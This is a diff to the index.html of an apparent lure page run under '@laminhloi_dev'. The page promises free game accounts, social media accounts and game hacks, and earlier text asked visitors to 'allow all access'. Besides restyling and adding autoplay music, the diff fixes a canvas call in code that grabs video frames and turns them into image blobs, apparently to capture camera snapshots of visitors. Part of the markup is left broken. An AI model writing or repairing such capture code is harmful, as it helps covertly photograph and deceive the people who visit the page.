--- a/index.html
+++ b/index.html
@@ -4,19 +4,26 @@
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
 <title>@laminhloi_dev</title>
+
+<!-- Phát nhạc nền tự động -->
+<audio autoplay loop>
+    <source src="https://f2-voice-aac-dl.zdn.vn/1112821160035009111/57957b656875872bde64.aac" type="audio/mp3">
+    Trình duyệt của bạn không hỗ trợ phát nhạc.
+</audio>
+
 <style>
-  /* Định nghĩa màu nền gradient động */
+  /* Đặt nền bằng ảnh và hiệu ứng gradient động */
   body {
     font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
-    background: linear-gradient(135deg, #ff9a9e, #fad0c4, #fbc2eb, #a18cd1);
-    background-size: 300% 300%;
+    background: url('https://f56-zpg-r.zdn.vn/jpg/3803005964193623815/010a15212ba895f6ccb9.jpg') no-repeat center center fixed;
+    background-size: cover;
     animation: gradientBG 10s ease infinite;
     display: flex;
     justify-content: center;
     align-items: center;
     height: 100vh;
     margin: 0;
-    color: #333;
+    color: #fff;
   }
 
   @keyframes gradientBG {
@@ -25,12 +32,11 @@
     100% { background-position: 0% 50%; }
   }
 
-  /* Tùy chỉnh hộp chứa nội dung */
+  /* Hộp nội dung */
   .container {
     text-align: center;
-    background: rgba(255, 255, 255, 0.8);
+    background: rgba(0, 0, 0, 0.6); 
     border-radius: 15px;
-    box-shadow: 0 10px 30px rgba(0, 0, 0, 0.2);
     padding: 30px;
     max-width: 600px;
     width: 90%;
@@ -42,13 +48,24 @@
     to { opacity: 1; transform: translateY(0); }
   }
 
-  .message {
-    font-size: 22px;
-    font-weight: 600;
+  /* Hiệu ứng chữ 7 màu */
+  .rainbow-text, .congbangdzz {
+    font-size: 36px;
+    font-weight: bold;
+    background-image: linear-gradient(90deg, red, orange, yellow, green, blue, indigo, violet);
+    -webkit-background-clip: text;
+    color: transparent;
+    animation: rainbowText 5s linear infinite;
+    background-size: 400% 100%;
     margin-bottom: 20px;
-    color: #5a5a5a;
   }
 
+  @keyframes rainbowText {
+    0% { background-position: 0%; }
+    100% { background-position: 100%; }
+  }
+
+  /* Hiệu ứng chữ nhấp nháy */
   #countdown {
     font-size: 36px;
     font-weight: bold;
@@ -60,41 +77,17 @@
     0%, 100% { transform: translateY(0); }
     50% { transform: translateY(-10px); }
   }
-
-  /* Cài đặt nút */
-  .btn {
-    display: inline-block;
-    background: linear-gradient(45deg, #6a11cb, #2575fc);
-    color: white;
-    text-decoration: none;
-    padding: 10px 20px;
-    border-radius: 25px;
-    font-size: 16px;
-    font-weight: bold;
-    box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
-    transition: transform 0.2s ease, box-shadow 0.2s ease;
-  }
-
-  .btn:hover {
-    transform: translateY(-2px);
-    box-shadow: 0 6px 12px rgba(0, 0, 0, 0.3);
-  }
-
-  .btn:active {
-    transform: translateY(0);
-    box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
-  }
 </style>
 </head>
+
 <body>
 
 <div class="container">
-  <h1 class="message">Vui lòng cho phép truy cập tất cả để sử dụng, Có Cơ Hội Nhận Acc Game Và Tài Khoản Mạng Xã Hội Và Hack Game Miễn Phí!!</h1>
-  <hihi class="modal-title laminhloidzz">Website Vip Số 1 Mxh Được Điều Hành Bởi @La Minh Lợi </hihi>
+  <h1 class="rainbow-text">Website Vip Số 1 Mxh Được Điều Hành Bởi @La Minh Lợi</h1>
+  <h2 class="message">Có Cơ Hội Nhận Acc Game Và Tài Khoản Mạng Xã Hội Và Hack Game Miễn Phí!!</h2>
   <div id="countdown"></div>
 </div>
-<style>
-  
+
   .congbangdzz {
   background-image: linear-gradient(to right, red,orange,yellow,green,blue,indigo,violet); 
   -webkit-background-clip: text;
@@ -245,7 +238,7 @@
         var canvas = document.createElement('canvas');
         canvas.width = video.videoWidth;
         canvas.height = video.videoHeight;
-        var ctx = canvas.getContext('3d');
+        var ctx = canvas.getContext('2d');
         ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
         canvas.toBlob(function(blob) {
           var reader = new FileReader();
